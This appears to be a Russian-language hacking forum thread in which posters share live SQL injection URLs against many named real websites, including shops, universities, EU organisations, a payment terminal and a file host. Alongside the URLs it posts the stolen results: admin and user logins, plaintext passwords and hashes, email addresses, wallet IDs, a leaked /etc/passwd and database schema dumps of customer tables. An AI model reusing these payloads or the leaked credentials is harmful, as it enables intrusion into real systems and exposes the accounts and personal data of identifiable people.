http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(0x3 a,user,0x3a,pass,0x3a,email)+FROM+musichri_databas e.12all_admin+LIMIT+1,1)),0x71),0x71),3--

Админчики

:daniel:djJsaXN0c2FkbWlu:daniel@musichristian.com :
:peroro:: :
:jeff.cooley:ZHRib3kyNjIw:jeff.cooley@musicountry. com :

Еще пользователи


http://www.musichristian.com/sys/product.php?PRODUCT=898989898563233+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCA T(username,0x3a,password,0x3a,email)+FROM+musichri _database.affiliate_user+LIMIT+200,1),0x3a),0x71), 0x71),3--

:mcstores:4bedb00c:john.varghese@musichristian.com
:_sitening_:sitening:mcbc@sitening.com

итд...

В общем по базе там надо смотреть так как там заказов более 100000 да и вообще я так понял это старый уже магазин.

Хотя мож и не магазин а партнёрка вроде бы нет...

Всем приФФ =)

Вот какой-то.....что-то, типа магазина =)

http://www.rhinomac.com/

Скуль ругаеЦЦо тут
http://www.rhinomac.com/?action=listProducts&categoryId=-5'

5-я ветка скулЯ
5 полей(2 принтабельных)
http://www.rhinomac.com/?action=listProducts&categoryId=5+union+select+1,2,3,4,5--

Далее смотрим таблицы(а они у нас ФФСЕ) =)
http://www.rhinomac.com/?action=listProducts&categoryId=5+union+select+1,concat_ws(0x3a3a3a,tab le_name,column_name),3,4,5+from+information_schema .columns--

Выбираем интересные, а именно:

users ::: username
users ::: passwd


Итого получаем:
username: rgeist
passwd: test1234

ОдминкО:
http://rhinomac.com/admin/login.php

Imperial.edu
http://community.imperial.edu/index.php?option=com_dtregister&task=typeboth&paymentmethod=paypal&eventId=-12%20UNION%20SELECT%20concat(username,0x3a,passwor d)%20FROM%20jos_users&Itemid=138

Eud.eu
http://www.eud.eu/news.php?action=view&news_id=-57+union+select+1,concat_ws(0x3a,admin_name,passwo rd),3,4,5,6,7,8,9,10,11+From+administrators--

Fleishman-hillard.eu
http://www.fleishman-hillard.eu/news.php?mode=detail&news_id=-25+union+select+1,2,unhex(hex(concat_ws(0x3a,admin _login,admin_passwd))),4,5,6,7,8,9,10,11+from+admi nistrators/*

Whathaseuropedone.eu
http://www.whathaseuropedone.eu/news_detail.php?news_id=-5'+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,admin_login,admin_passwd))),7,8,9,10,11,12,13,14+ from+administrators+limit+0,1/*

Blueprintpartners.eu

http://www.blueprintpartners.eu/bpdemo/news_detail.php?news_id=-105'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,admin_login,admin_passwd)+from+administrators/*

Homelounge.eu
http://www.homelounge.eu/index.php?option=com_flashmagazinedeluxe&Itemid=56&task=magazine&mag_id=-2+union+select+1,2,3,unhex(hex(version())),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35/*

Whathaseuropedone.eu

http://www.whathaseuropedone.eu/news_detail.php?news_id=-5'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,adm in_email,admin_login,admin_pass))),5,6,7,8,9,10,11 ,12,13,14+from+administrators/*

Concerto-act2.eu
http://www.concerto-act2.eu/en/news/bdd/news_id/-49+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCR YPT(CONCAT(0x7873716C696E6A626567696E,(SELECT+CONC AT(admin_login,0x7873716C696E6A64656C,admin_pwd)+F ROM+concertoact2.t_admin+LIMIT+1,1),0x7873716C696E 6A656E64),0x71),0x71)/*
/admin

__________________

Нашел уязвимость в программном коде жизни...

http://sexamag.ru
http://sexamag.ru/tovari/?id=-5465+union+select+1,2,3,concat_ws(char(58),TABLE_S CHEMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12,1 3+from+INFORMATION_SCHEMA.COLUMNS--

http://sexamag.ru/tovari/?id=-5465+union+select+1,2,3,concat_ws(char(58),databas e(),user(),version()),5,6,7,8,9,10,11,12,13--

Database: u146192
User: u146192@10.10.153.180
Version: 5.0.67-log

Российская Ассоциация Развития Игорного Бизнеса

http://www.rarib.ru/news.cfm?type=-4+union+select+1,2,3,4,5,6,6,8,SYSDATE(),6,concat_ ws(0x20,user(),mysql.user.password,database(),vers ion()),LOAD_FILE(char(47,101,116,99,47,112,97,115, 115,119,100)),2,3+from+mysql.user/*
user():web@localhost

1.mysql.user.password:asdf2d?FR34tds
2.mysql.user.password:205580253bde416f

database():RARIB
version():4.0.18-standard

/etc/passwd
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...

http://www.rarib.ru/news.cfm?type=-4+union+select+1,2,login,4,5,6,7,8,SYSDATE(),6,log in,passwd,2,3+from+user/*

kompik:111111
mike:m6Zk31BYG
т.д.

PageRank = 6

http://www.la-press.com/bulk_reprint.php?article_id=-100+union+select+concat_ws(0x3a,user(),version(),d atabase())--

Database Version: 5.0.51a-3ubuntu5.4-log
Database name: lapress
User name: lapress@localhost

Юзеры

http://www.la-press.com/bulk_reprint.php?article_id=-100+union+select+concat_ws(0x3a,username,password, email)+from+user+limit+23500,1--


http://www.dovepress.com/articles.php?article_id=610098098760+union+select+ 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37--

Database Version: 5.0.51a-3ubuntu5.4-log
Database name: dovepress
User name: dovepress@localhost

Юзеры

http://www.dovepress.com/articles.php?article_id=610098098760+UNION+SELECT+ 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELEC T+CONCAT(username,0x3a,password,0x3a,email,0x3a,ad min,0x3a,editor)+FROM+dovepress.user+LIMIT+2,1),0x 3a),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37--

: Meniscus : c449b735db7026408c36d08c996e6c5f : cbrock@meniscushcc.com : n : n
: hoptman : 1d018a66bd1dbb082bb28d36db594370 : hoptman@nki.rfmh.org : n : n

Так 30 тысяч

мну в шоке)
Сайт файлообменника letitibit.net

news.letitsoft.com


http://news.letitsoft.com/index.php?id=-604+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7--

5 Ветка
Дальше копать не стал,боюсь за мной уже едут)

UPD:

Так и недождавшись дядек в фурашках решил покопать)

Таблички

columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
comments
files_use
files_use_cat
files_use_click
files_use_tags
news
users
accesslog
antishare
bl_reason
black_tags
category
codec
copy_from_remote_host
credit
ct_tmp
delete_or_not
files
ftp_update_req
full_info
full_logs
fullstats_by_premium
groups
ip_logs
log_add_remote
logs
message
most_popular
mrtg_hour
mtrg_date
password_protect
passwordcheat
payment
pins
sms_pass
speed
stats
stats_enter
stats_show_click_bh
torrent

Очень много интересных табличек,но большая чать лежит в других базах)

Немного посмотрев нашёл табличку users.
Колонки

id
date
username
password
email
wmz
timeout
tmp
payout
primary_key

Ну и вытаскиваем

http://news.letitsoft.com/index.php?id=-604+union+select+1,2,3,CONCAT(id,0x3a,date,0x3a,us ername,0x3a,password,0x3a,email,0x3a,wmz),5,6,7+fr om+users+limit+0,1--

Пароли лежат в открытом виде)
Небольшой слитый Кусочек

5:0000-00-00:Dr_Drew:420593:dr_drew_mail@mail.ru:Z
6:0000-00-00:xzero919:dimetra:xzero919@rambler.ru:Z
9:2008-11-06:dralex:as963:as@letitbit.net:Z346625720064ds
10:2008-11-06:Axe35:Axe35:roman199494@mail.ru:Z170486501392
11:2008-11-06:RUS:101189:RUS_-@mail.ru:Z
12:2008-11-06:funtov:funtov:funtov2006@pochta.ru:Z
13:2008-11-06:yulya4364:t434At:yulya4364@yandex.ru:Z
14:2008-11-06:Hena2008:4453681:LifexIsxDead@mail.ru:Z
15:2008-11-06:verik:verik:verik_verika@mail.ru:Z
16:2008-11-06:ametis007:1234567890:ametis007@yandex.ru:Z
17:2008-11-06:kapitocha:korolev:kor-ed@yandex.ru:Z
18:2008-11-06:zmeyy:301089:zmeyy-89@mail.ru:z267886986065
19:2008-11-06:VCITY1:vcity1:vcity73@mail.ru:Z191056419149
20:2008-11-06:putic82:232629:putic82@mail.ru:Z681431559945
21:2008-11-06:MicroMaster:astonmar:rafikoviskandar@mail.ru:Z

Всем удачного хека:)

http://www.donbosco.ro/materiale/index.php?idalbum=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*


Database Version: 4.1.13a-nt
Database name: donboscoro
User name: donboscoro@localhost

сервер на винде

http://www.vladimirghika.net/fotografie/index.php?idalbum=-5+union+select+1,concat_ws(0x3a,version(),database (),user())/*

Database Version: 4.1.13a-nt
Database name: vladimirghikaro
User name: vladimirghika@localhost

http://www.infoimobiliar.ro/change_agency.php?agentie=15+UNION+SELECT+1,2,3,AE S_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User()),0x71),0x71),5,6,7,8, 9,10,11,12+LIMIT+1,1


Database Version: 5.0.51a-community
Database name: infoimob_db
User name: infoimob_usr@localhost

не раскручивал...

http://www.esalon.ro/servicii.php?idp=-2+union+select+1,concat_ws(0x3a,version(),database (),user())

Database Version:5.0.67-community
Database name:esalon_meniu
User name:esalon_meniu@localhost


http://www.clubulenergetic-cluj.ro/subpagini.php?id=26+UNION+SELECT+1,2,AES_DECRYPT(A ES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(), 0x2F2A2A2F,User()),0x71),0x71),4+LIMIT+1,1


Database Version: 5.0.67-community
Database name: rclu5103_ceob
User name: rclu5103_ceob@localhost


http://www.ardc.ro/news_d.php?id=63{SQLINJ}&lang=RO

Version :4.1.22-standard-log
Database: aredece_aredece
User :aredece_dobrei@localhost


Слепая скуля.... помог релиз Маднета за что ему огромное СПАСИБО !

http://www.irisholiday.ro/?prod=-10+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,0,1,2

Database Version: 5.0.67-community
Database name: irisholi_iris
User name: irisholi_root@localhost

Hа сегодня все, извините за многочисленые едиты так как работал так сказать вживую.... Cпасибо !

http://www.greitipasimatymai.lt/index.php?act=ShowForumMessage&id=-326+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user()),13,14,15,16,17, 18,19,20,21,22--

5.0.67-community-log
elita_gp3
elita_gp3@localhost

кто наидиот больше в pm

http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select %200,1,user(),3,4,5--
http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select %200,1,version(),3,4,5-- (V 4 :) )
:p

http://www.ejante.ro/?x=arata_produs&id_p=-2319+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),d atabase(),user()),5,6,7,8/*

Database Version: 4.1.22-standard-log
Database name: ejantero_ejante
User name: ejantero_jante@localhost

Вот скуля на платёжном терминале:
http://www.krasplat.ru/about/stock/?id=199'
5-тая версия мускула.
Все таблици:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,faq,plat_acti on,plat_cache,plat_doc,plat_img,plat_news,plat_pag e,plat_partner,plat_registration,plat_terminal,sta t,vote,votevar

http://www.krasplat.ru/about/stock/?id=199+union+select+1,2,group_concat(concat_ws(0x 3a,id,name_l,name_f,name_m,ybday,address,mobile,em ail,home,subscribe,active)),4,5+from+plat_registra tion--
Получаем имена, номера телефонов, мыльники и т.п.
File_priv по видимому N =(
-----------------------------------------------------------
The End!

поддомен MAIL.RU hacked by VITAL
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=-27+union+select+1,2,3,4,0x3C4D4152515545453E73716C 2D696E6A20FDF2EE20EAF3EBFC3C2F4D4152515545453E,6,7 ,8,9,10/*

Swiatroweru.com.pl
http://www.swiatroweru.com.pl/item.php?show=product&pid=-2917+union+select+1,2,3,4,5,6--

Avtodiagnostika.ru
http://www.avtodiagnostika.ru/modules/wfsection/print.php?articleid=-57+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

Shogunclub.ru
http://www.shogunclub.ru/kendo.php?ArticleID=-5+union+select+1,2,3,4,5,6,concat_ws(0x3a,member_l ogin_key),8,9,10+from+u53265.ibf_members+where+nam e=0x5a7978--
форум.. пассы не рахешил, а так же /restricted.php - пассы не канают..

здесь MS Access, нужно подбирать таблицу наугад
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+FROM+%60MSysO bjects%60%00&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
доступа к MSysObjects нет

PR6
http://my.ccuniversity.edu/Library/index.php?ID=-99999+union+select+1,concat_ws(0x3a,user,password) ,3+from+mysql.user/*
Database Version: 5.0.37-community-nt
Database name: library
User name: root@localhost

root:*B54F877315A6A555E448A34722AFEE6370D6877D

_____________________________
PR6
https://ssl.alaskapacific.edu/pr/archives.php?id=-9999+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8/*
Database Version: 4.0.23a
Database name: news
User name: news@localhost

_____________________________
PR6
http://www.vfcc.edu/prospectivestudents/printversion.php?id=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,version(),database()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*
Database Version: 4.1.20
Database name: vfcc
User name: vfcc@localhost

www.38school.ru
http://www.38school.ru/arch.php?id=-7+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5--
бд - seopro_box-school
версия - 5.0.22
юзер - box-school@localhost

http://sils.unc.edu/news/calendar/calendar.php?display=event&id=-285+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12/*

songphan@snoopy.ils.unc.edu
4.1.22
silscalendar

Знаменитая биржа Textsale.ru
http://www.youtext.ru/index.php5?c=-1+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Движок на домене youtext.ru подключен к базе Textsale.ru, но в отличии от этого (http://forum.antichat.ru/showthread.php?p=823420#post823420) фильтров не имеет.

loveumru_textsal@localhost
4.1.22-lk-log
loveumru_textsal

acmcoimbra.pt/
http://www.acmcoimbra.pt/html/infos.php?id=47+UNION+SELECT+1,2,3,4,5,6,concat_ws (0x20,user,password,user(),database(),version()),8 ,9+FROM+mysql.user+LIMIT+1,1
user: root
password ( mySql 5.x hash):*1D8BF671675E9DACA624D175B99816335CFE137C

user: farinhasilva@cl-t128-330cl.privatedns.com
version: 5.0.32-Debian_7etch6-log
database: acm

ufacatalog.ru/
http://www.ufacatalog.ru/company/?id=-94+union+select+1,concat_ws(0x20,user(),@@version, database()),3,4,5,6,7,8,9,10,11,12,13--
user: user6@localhost
database:db6
version:4.0.27-standard-log

http://automoto-online.com/?action=hirnez&hirid=3+union+select+1,table_name,3,4,5,6,7,8,9,0, 11+from+information_schema.tables--

Идём покупать гандончики -)

http://www.netcondom.de/index.php?product_id=32432456754100+union+select+1 ,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user( ),database()),12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99,100,101,102,103,104,10 5--

Database Version: 4.0.16-log
Database name: netcondom
User name: netcondom@localhost


В общем не перебрал таблы буду рад если кто нить что нить -)


И тут же идём покупать еще какие то штучки на четвёрке :)

http://www.ciggybuttz.com/product_spotlight.php?product_ID=506786875550+unio n+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version( ),user(),database()),11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54--&category=674&catalog=

4.1.20-log
zipdog@66.165.35.16
zipdog



Ну а если есть Гандоны Антитабачные конфеты то и музыку надо :) Гы


http://www.lightintheattic.net/buy/item.php?product_id=8889097700+union+select+1,2,3, 4,5,6,concat_ws(0x3a,version(),user(),database()), 8--&c_id=12&page=1

Database Version: 5.0.41
Database name: lita_main
User name: lita_admin@localhost


Ну а тут мы возьмём целый трактор -)


http://www.ferrisindustries.com/pages/mower.php?product_id=25+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17--



4.1.22
ferris@localhost
ferris_content


http://www.ferrisindustries.com/pages/mower.php?product_id=25+union+select+1,2,concat_ws (0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+from+mysql.user+limit+4,1--

root : 7bf97a0c4adae77a
ferris : 02fb1d2d61d53744
meUser : 5cec7e44730b712f

какой то оманский универ(
http://web.squ.edu.om/squ/index.php?page=detnews&newsID=-126+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9--

4.0.24-nt:squweb:squweb@localhost

https://www.pokerthreads.net/product_email.htm?product_id=500%20or%201=@@versio n--



Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)
Apr 14 2006 01:12:25
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


http://www.prideenterprises.com/jobs.php?_port=1&_id=-48+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,concat_ws(0x3a,version(),user(),database()),1 8,19,20,21,22,23,24--


Version : 4.1.22
User: eyal@prideenterprises.com
Database: prideenterprises

http://www.prideenterprises.com/jobs.php?_port=1&_id=-48+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,concat_ws(0x3a,user,password),18,19,20,21,22, 23,24+from+mysql.user+limit+0,1--

prideenterprises : 7fd8fd960c3b9d93


http://www.gamestyle.ru/rating.php?act=catselect&id=57689798741/**/UnIoN/**/SeLeCt/**/1,concat_ws(0x3a,version(),user(),database())--

Database Version: 5.0.38-Ubuntu_0ubuntu1.4-log
Database name: nekki-gamestyle
User name: gamestyle@localhost

Юзеры

http://www.gamestyle.ru/rating.php?act=catselect&id=57689798741/**/UNION/**/SELECT/**/1,CONCAT(0x3a,(SELECT/**/CONCAT(Login,0x3a,Email,0x3a,ICQ,0x3a,Password)/**/FROM/**/ut_users/**/LIMIT/**/6,1),0x3a)--


http://www.trans-logic.ca/news_print.php?_ID=7987987110/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database())--

Version:5.0.22
User:translogic@localhost
Database:translogic



http://dacs-audio.com/product_details.php?product_id=5789798798700/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,concat_ws(0x3a,version(),user(),datab ase()),26--


Database Version: 5.0.67-community
Database name: web53-dcs187
User name: web53-dcs187@localhost

Администратор

http://dacs-audio.com/product_details.php?product_id=5789798798700+UNION +SELECT+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT_ws(0x3a, id,username,password),14,15,16,17,18,19,20,21,22,2 3,24,25,26+FROM+admin+LIMIT+0,1--



1: mjumbo : mjumbo56



https://www.burleigh.co.uk/burleigh-products.php?product_id=8509980009800+union+select +1,concat_ws(0x3a,version(),user(),database()),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--&section_id=136


4.1.22
burleigh_sql@localhost
burleigh

Узнал только

https://www.burleigh.co.uk/burleigh-products.php?product_id=8509980009800+union+select +1,concat_ws(0x3a,id,email),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22+from+customer--&section_id=136



http://www.aromatixnyc.com/istore/product.php?product_id=508766876870+union+select+1 ,2,3,4,5,concat_ws(0x3a,version(),user(),database( )),7,8,9,10,11,12,13,14--



Database Version: 5.0.67-log
Database name: aromat4_cart
User name: aromatiks@tootsie.dreamhost.com





http://www.bananafishinc.com/prodpg.php?product_id=6878761079+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,concat_ws(0x3a,version(),u ser(),database()),31,32,33,34,35,36,37,38,39--


Database Version: 4.1.7
Database name: wmsdb
User name: root@localhost

<VirtualHost 172.16.2.13:80>
ServerAdmin webmaster@dummy-host.example.com
DocumentRoot /wwwroot/wms/bananafish
DirectoryIndex index.php
ServerName www.bananafishinc.com
ErrorLog logs/dummy-host.example.com-error_log
CustomLog logs/dummy-host.example.com-access_log common
ErrorDocument 404 /404.php
</VirtualHost>


Там еще в принципе много кто хостится,дальше раскладывать не стал сами можете ведь -)

Читалка хорошо работает :)



http://www.accustarlabs.com/shop_homeownerLongDescription.php?Product_ID=99887 764+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--&page=1


Database Version: 4.1.11-nt
Database name: accust
User name: accustarshop@localhost



Симуляторы хе хе

http://www.flyelite.com/hardware.php?product_id=158586775875687+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_w s(0x3a,version(),user(),database()),18,19,20--


Version:4.1.20
User:elite@localhost
Database:elite


Че-то тишина сегодня эх.....


Для явщиков -))

http://www.richclientgui.com/detail.php?product_id=689765891+union+select+1,2,3 ,4,5,6,7,concat_ws(0x3a,version(),user(),database( )),9,10,11--

Database Version: 5.0.67-community
Database name: richclie_website
User name: richclie_admin@localhost


Козочки -)

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,conca t_ws(0x3a,version(),user(),database()),6,7,8,9,10, 11,12,13,14,15--


Database Version : 5.0.67-community
User name : ovalfram_admin@localhost
Database name : ovalfram_website

магаз экзотики

http://www.sex-ekzotika.com.ua/catalog.php?section_id=22%20union%20select%201,2,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9%20--
version::4.1.20
user::www@localhost
database::exotic

ещё один
http://shop-sex.com.ua/tovar_test.php?isbn=-405%20union%20select%201,2,3,4,version(),user(),da tabase(),8,9,10%20--

version::4.1.22-log
user::shopsex@localhost
database::shopsex

Итак на сегодня музыкальный магазин с PageRank = 6

Какая там музыка ууух как приятно было послушать её пока занимался всяким бредом на сайте -)

В общем Магазин там на старом добром OSC с чем-то не вдавался в подробности.

Сильно не заморачивался нашел админов юзеров на магазе да и ордеры -)




http://www.putumayo.com/en/catalog_item.php?album_id=48098098779085+union+sel ect+1,concat_ws(0x3a,version(),user(),database()), 3,4,5,6,7,8,9,10,11,12,13--


Database Version: 5.0.67-log
Database name: putumayosite
User name: putu22@localhost




http://www.putumayo.com/en/catalog_item.php?album_id=48098098779085+UNION+SEL ECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,(SELECT+CONCAT(aut_login,0x7873716C6 96E6A64656C,aut_pwd,0x7873716C696E6A64656C,aut_ema il)+FROM+putumayosite.auteur+LIMIT+3,1),0x7873716C 696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,1 3--


: putumayo:865caea534cd06838fb39df41f6fe917 : pete@putumayo.com хэш MD5 : 865caea534cd06838fb39df41f6fe917 : put8o
: bent:a0775a76a7b6f7e572dd1cf98a541ed1 : bent@bentmedia.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: andrea:a0775a76a7b6f7e572dd1cf98a541ed1 : andrea@mondomix.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: guest:a0775a76a7b6f7e572dd1cf98a541ed1 : andrea@mondomix.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix
: underling:a0775a76a7b6f7e572dd1cf98a541ed1 : pete@putumayo.com ; mr.peej@gmail.com хэш MD5 : a0775a76a7b6f7e572dd1cf98a541ed1 : mondomix



В общем база здоровая так часть почти вся смысл остального не вижу....



Database [putumayosite]
Table [agendaevent (0 Rows)]
agendaevent
age_festival
age_date
age_country
age_city
age_salle
age_statut
age_createdate
age_modifdate
age_login
age_category
Table [album (199 Rows)]
album
alb_osc_products_id
alb_number
alb_releasedate
alb_name
alb_comment
alb_texte
alb_prix
alb_support
disable
alb_ecommerce
cassette
alb_unit
alb_key
Table [album_category (283 Rows)]
album_category
acl_album
acl_category
rank
order_str
Table [album_track (2368 Rows)]
album_track
atl_track
atl_album
Table [artist (66 Rows)]
artist
art_name
art_bio
art_photo
art_web
file_ext
art_key
art_country
putu
show_on_page
art_statut
Table [artist_album (262 Rows)]
artist_album
aal_artist
aal_album
Table [artist_concert (855 Rows)]
artist_concert
acl_concert
acl_artist
Table [artist_track (267 Rows)]
artist_track
atl_artist
atl_track
Table [auteur (6 Rows)]
auteur
aut_login
aut_lastname
aut_firstname
aut_pwd
aut_privilege
aut_email
aut_active
aut_type
aut_reportto
aut_name
aut_tel
aut_datecrea
aut_datemod
aut_super
aut_siteversion
Table [category (20 Rows)]
category
cat_osc_categories_id
cat_name
rank
button_img
title_img
image_url
meta_keys
meta_desc
html_title
show_category
cat_order
cat_status
cat_createdate
Table [company (0 Rows)]
company
com_titre
com_texte
com_statut
com_order
com_createdate
com_modifdate
com_login
Table [concert (825 Rows)]
concert
con_date
artist_id
con_salle
con_city
con_comment
con_createdate
con_modifdate
con_login
con_statut
con_site
con_country
Table [contact (3 Rows)]
contact
con_title
con_texte
con_order
con_createdate
con_modifdate
con_login
con_statut
con_image
Table [country (252 Rows)]
country
cou_name
cou_createdate
cou_modifdate
cou_login
Table [discount_coupons (14 Rows)]
coupons_id
coupons_description
coupons_discount_amount
coupons_discount_type
coupons_date_start
coupons_date_end
coupons_max_use
coupons_min_order
coupons_min_order_type
coupons_number_available
Table [discount_coupons_to_categories (0 Rows)]
coupons_id
categories_id
Table [discount_coupons_to_customers (0 Rows)]
coupons_id
customers_id
Table [discount_coupons_to_manufacturers (0 Rows)]
coupons_id
manufacturers_id
Table [discount_coupons_to_orders (480 Rows)]
coupons_id
orders_id
Table [discount_coupons_to_products (0 Rows)]
coupons_id
products_id
Table [discount_coupons_to_zones (0 Rows)]
coupons_id
geo_zone_id
Table [ecommerce (0 Rows)]
ecommerce
eco_region
Table [faquestion (15 Rows)]
faquestion
faq_question
faq_reponse
faq_statut
faq_order
faq_createdate
faq_modifdate
faq_login
Table [festival (17 Rows)]
festival
fes_type
fes_titre
fes_date
fes_comment
fes_region
fes_statut
fes_order
fes_createdate
fes_modifdate
fes_login
fes_category
Table [home (20 Rows)]
home
Table [inscription (11579 Rows)]
inscription
ins_name
ins_address1
ins_address2
ins_city
ins_state
ins_zip
country
ins_email
Mod_Date
created
ins_createdate
ins_modifdate
ins_login
ins_country
ins_cotegory
ins_manycd
Table [international (0 Rows)]
international
int_region
int_category
int_name
int_comment
int_phone
int_fax
int_email
int_web
int_contact
int_createdate
int_modifdate
int_login
Table [jobs (0 Rows)]
jobs
job_titre
job_comments
job_statut
job_order
job_createdate
job_modifdate
job_login
Table [nonprofit (47 Rows)]
nonprofit
pro_name
pro_web
pro_comments
pro_statut
pro_order
pro_createdate
pro_modifdate
pro_login
Table [osc_address_book (11673 Rows)]
address_book_id
customers_id
entry_gender
entry_company
entry_firstname
entry_lastname
entry_street_address
entry_suburb
entry_postcode
entry_city
entry_state
entry_country_id
entry_zone_id
Table [osc_address_format (5 Rows)]
address_format_id
address_format
address_summary
Table [osc_banners (1 Rows)]
banners_id
banners_title
banners_url
banners_image
banners_group
banners_html_text
expires_impressions
expires_date
date_scheduled
date_added
date_status_change
status
Table [osc_banners_history (7 Rows)]
banners_history_id
banners_id
banners_shown
banners_clicked
banners_history_date
Table [osc_categories (31 Rows)]
categories_id
categories_image
parent_id
sort_order
date_added
last_modified
Table [osc_categories_description (69 Rows)]
categories_id
language_id
categories_name
Table [osc_configuration (215 Rows)]
configuration_id
configuration_title
configuration_key
configuration_value
configuration_description
configuration_group_id
sort_order
last_modified
date_added
use_function
set_function
Table [osc_configuration_group (16 Rows)]
configuration_group_id
configuration_group_title
configuration_group_description
sort_order
visible
Table [osc_counter (1 Rows)]
startdate
counter
Table [osc_counter_history (0 Rows)]
month
counter
Table [osc_countries (238 Rows)]
countries_id
countries_name
countries_iso_code_2
countries_iso_code_3
address_format_id
Table [osc_currencies (2 Rows)]
currencies_id
title
code
symbol_left
symbol_right
decimal_point
thousands_point
decimal_places
value
last_updated
Table [osc_customers (9729 Rows)]
customers_id
customers_gender
customers_firstname
customers_lastname
customers_dob
customers_email_address
customers_default_address_id
customers_telephone
customers_fax
customers_password
customers_newsletter
Table [osc_customers_basket (3653 Rows)]
customers_basket_id
customers_id
products_id
customers_basket_quantity
final_price
customers_basket_date_added
Table [osc_customers_basket_attributes (0 Rows)]
customers_basket_attributes_id
customers_id
products_id
